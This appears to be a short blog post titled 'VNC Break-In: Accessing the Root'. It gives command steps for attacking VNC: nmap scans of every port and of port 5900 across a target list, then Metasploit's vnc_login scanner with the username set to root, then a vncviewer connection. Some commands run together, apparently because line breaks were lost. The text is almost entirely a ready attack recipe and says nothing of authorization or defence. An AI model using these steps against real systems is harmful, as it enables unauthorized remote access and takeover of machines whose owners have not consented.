VNC Break-In: Accessing the Root
nmap -p0- -iL target.txt -T4 -oN all-port-nmap-output.txtnmap -p 5900 -sV -sC -iL target.txt -T4 -oN detailed-nmap-output.txtSteps to Exploit VNC with Metasploit
msfconsolesearch vnc_login
use 0 (auxiliary/scanner/vnc/vnc_login)optionsset RHOST <IP>
set USERNAME root
optionsrun OR exploitvncviewer <IP>
Comments
Post a Comment